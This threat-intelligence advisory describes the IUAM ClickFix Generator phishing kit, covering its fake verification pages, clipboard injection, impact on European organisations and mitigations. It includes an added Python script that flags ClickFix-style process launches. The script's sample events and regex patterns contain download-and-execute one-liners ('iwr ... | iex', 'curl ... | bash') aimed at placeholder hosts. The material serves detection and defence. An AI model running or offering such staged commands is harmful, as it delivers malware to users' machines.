The ClickFix Factory: First Exposure of IUAM ClickFix Generator
The IUAM ClickFix Generator is a phishing kit that automates the creation of phishing pages mimicking browser verification challenges to bypass automated traffic blocks. It features advanced capabilities such as operating system detection and clipboard injection, facilitating cross-platform malware deployment with minimal effort. This kit is primarily used to deploy malware including info stealers and remote access trojans (RATs). Although no known exploits in the wild have been reported yet, the kit’s sophistication and automation increase the risk of widespread phishing campaigns. European organizations are at risk due to the kit’s ability to evade detection and target multiple operating systems. Mitigation requires enhanced phishing awareness, deployment of advanced email and web filtering, and monitoring for clipboard injection behaviors. Countries with high internet usage, significant financial sectors, and large enterprise environments such as Germany, the UK, France, and the Netherlands are more likely to be targeted. Given the potential for credential theft and remote access compromise without requiring user interaction beyond clicking, the threat severity is assessed as high. Defenders should prioritize detection of phishing pages mimicking IUAM challenges and monitor for indicators of clipboard injection and malware deployment.
AI Analysis
Technical Summary
The IUAM ClickFix Generator is a newly uncovered phishing kit designed to automate the creation of phishing pages that impersonate browser verification challenges, the interstitial pages commonly used to block automated traffic such as bots. The impersonated challenge, IUAM (I'm Under Attack Mode), is exploited to trick victims into believing they must complete a verification step, thereby increasing the likelihood of interaction. The kit supports advanced features including operating system detection, allowing it to tailor payloads or phishing content to the victim's platform and so work across Windows, macOS, and potentially other systems. Clipboard injection is another sophisticated feature: it silently inserts malicious commands or data into the victim's clipboard, facilitating stealthy deployment of malware such as info stealers (e.g., DeerStealer) and remote access trojans (RATs). These capabilities reduce the effort attackers need for cross-platform attacks and increase the chances of successful infection. The generated phishing pages are highly customizable, so threat actors can adapt them to different targets and scenarios. Although no active exploits have been reported in the wild, the availability of such a kit lowers the barrier to launching phishing campaigns that bypass automated defenses.

The kit's behaviour maps to the MITRE ATT&CK techniques T1036 (Masquerading), T1102 (Web Service), T1059 (Command and Scripting Interpreter), T1055 (Process Injection), and T1115 (Clipboard Data), which highlights its multi-faceted approach to evasion and infection. This threat represents a significant evolution in phishing toolkits by combining social engineering with technical evasion and malware delivery features.
Potential Impact
For European organizations, the IUAM ClickFix Generator poses a substantial risk by enabling sophisticated phishing campaigns that can bypass traditional automated traffic filters and deceive users into executing malicious payloads. The potential impacts include credential theft, unauthorized remote access, data exfiltration, and broader network compromise through deployed RATs and info stealers. Financial institutions, government agencies, and enterprises with sensitive data are particularly vulnerable due to the high value of stolen credentials and access. The cross-platform nature of the kit increases the attack surface, affecting organizations using diverse operating systems including macOS, which is increasingly prevalent in European corporate environments. The clipboard injection technique can lead to stealthy malware execution that evades detection by conventional endpoint security solutions. Additionally, the kit’s automation capabilities may lead to rapid scaling of phishing campaigns, increasing the volume and reach of attacks. This can strain incident response resources and increase the likelihood of successful breaches. The absence of known exploits in the wild currently limits immediate impact, but the availability of the kit suggests a high potential for future exploitation. Overall, the threat could lead to significant operational disruption, financial loss, and reputational damage for affected organizations in Europe.
Mitigation Recommendations
European organizations should implement targeted defenses against this threat:
- Enhance phishing detection capabilities to recognize IUAM-style browser verification mimicry.
- Deploy advanced email filtering solutions that use machine learning to detect phishing content and URLs associated with the ClickFix Generator.
- Configure web gateways to block access to known phishing domains and monitor for unusual traffic patterns indicative of automated phishing campaigns.
- Tune endpoint detection and response (EDR) tools to detect clipboard injection behaviors and suspicious process injections associated with info stealers and RATs.
- Include the risks of fake browser verification pages and the dangers of interacting with unexpected clipboard content in user awareness training.
- Use network segmentation to limit lateral movement if a compromise occurs.
- Monitor threat intelligence feeds for emerging indicators related to this kit and update intrusion detection/prevention systems accordingly.
- Prepare incident response playbooks for phishing incidents involving clipboard injection and remote access malware.
- Enforce multi-factor authentication (MFA) to reduce the impact of credential theft resulting from phishing.
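As an added example (not code from this advisory or from Unit 42), the following Python pass shows what the EDR tuning above looks like in practice: it screens process-creation telemetry for the execution end of a ClickFix lure. It assumes the usual ClickFix flow in which the victim pastes the injected clipboard content into a run prompt or terminal, so the scripting interpreter is spawned by an interactive shell; the field names, host names, URLs and sample events are all constructed.

```python
"""Screen process-creation telemetry for the execution end of a ClickFix lure.

Added example, not code from the advisory or from Unit 42. Assumption: the lure
ends with the victim pasting the injected clipboard content into a run prompt
or terminal, so the scripting interpreter (T1059) is spawned by an interactive
shell rather than by a service, installer or scheduled task, and its command
line carries a download-and-execute stage. Field names follow Sysmon Event ID 1
style telemetry; every event below is a constructed sample.
"""
import json
import re
from typing import List, Optional

# Interpreters the page maps to T1059, compared on the lower-cased basename.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "msiexec.exe",            # Windows
    "bash", "zsh", "sh", "osascript",        # macOS
}
# Parents that correspond to a user pasting into a run prompt or a terminal.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}

# Command-line traits of a staged one-liner; each hit is reported by name.
TRAITS = {
    "remote_fetch": re.compile(
        r"https?://|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|\bwget\b", re.I),
    "in_memory_exec": re.compile(
        r"\biex\b|invoke-expression|\|\s*(?:ba|z)?sh\b|\bmshta\b", re.I),
    "obfuscation": re.compile(
        r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|frombase64string"
        r"|-w(?:indowstyle)?\s+hidden", re.I),
}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX paths."""
    return re.split(r"[\\/]", path)[-1].lower()


def assess(event: dict) -> Optional[dict]:
    """Return an alert dict for one event, or None if it does not fit the pattern."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in INTERPRETERS or parent not in INTERACTIVE_PARENTS:
        return None
    cmd = event.get("CommandLine", "")
    traits = [name for name, rx in TRAITS.items() if rx.search(cmd)]
    if not traits:
        return None  # a user simply opened a console; nothing staged
    return {"host": event.get("Computer"), "parent": parent,
            "image": image, "traits": traits, "command": cmd}


def detect(events: List[dict]) -> List[dict]:
    """Run assess() over a batch and keep the hits, preserving input order."""
    return [a for a in (assess(e) for e in events) if a]


# Constructed sample events; hosts and URLs are placeholders, not indicators.
SAMPLE_EVENTS = [
    {   # Windows: run-prompt paste, staged fetch, in-memory execution, hidden window
        "Computer": "WS-FIN-042", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://stage.example.invalid/v.txt | iex"',
    },
    {   # Windows: scheduled maintenance script; parent is a service, not a user
        "Computer": "SRV-BK-01", "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\ProgramData\Backup\nightly.ps1",
    },
    {   # Windows: user opened a console; interactive parent but nothing staged
        "Computer": "WS-FIN-042", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
    {   # macOS: Terminal paste of a curl-to-shell stage
        "Computer": "MBP-HR-17",
        "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "Image": "/bin/bash",
        "CommandLine": 'bash -c "curl -fsSL http://stage.example.invalid/x | bash"',
    },
]

if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_EVENTS), indent=2))
```

Requiring an interactive parent is what keeps scheduled and service-launched scripts out of the alert set; tune INTERACTIVE_PARENTS to the launchers actually present in your estate.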
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain
Indicators of Compromise
Technical Details
- Author: AlienVault
- TLP: white
- References: https://unit42.paloaltonetworks.com/clickfix-generator-first-of-its-kind/
- Adversary: null
- Pulse Id: 68e94967bcab143b278f0611
- Threat Score: null
Threat ID: 68e94bbba811ebd3155d19b1
Added to database: 10/10/2025, 6:08:59 PM
Last enriched: 10/10/2025, 6:24:57 PM
Last updated: 10/11/2025, 2:23:12 AM
Views: 6